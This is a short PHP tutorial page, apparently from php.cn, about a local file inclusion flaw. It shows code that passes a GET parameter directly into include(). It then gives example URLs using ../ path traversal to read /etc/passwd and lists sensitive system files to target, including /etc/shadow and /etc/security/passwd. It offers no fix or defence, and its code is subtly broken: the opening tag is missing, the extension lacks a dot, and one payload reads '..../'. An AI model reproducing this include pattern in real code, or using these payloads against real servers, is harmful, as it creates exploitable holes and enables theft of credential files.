Home > Backend Development > PHP Tutorial > PHP forges local files containing vulnerable code

PHP forges local files containing vulnerable code

高洛峰
Release: 2023-03-01 12:56:02
Original
1251 people have browsed it

The code is as follows:
$page=$_GET['page'];
include($page.'php');
?>

You can use it like this
http://www.xxx .com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www .xxx.com/index.php?page=..../../etc/passwd

Get more data:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc /group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

Related labels:
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template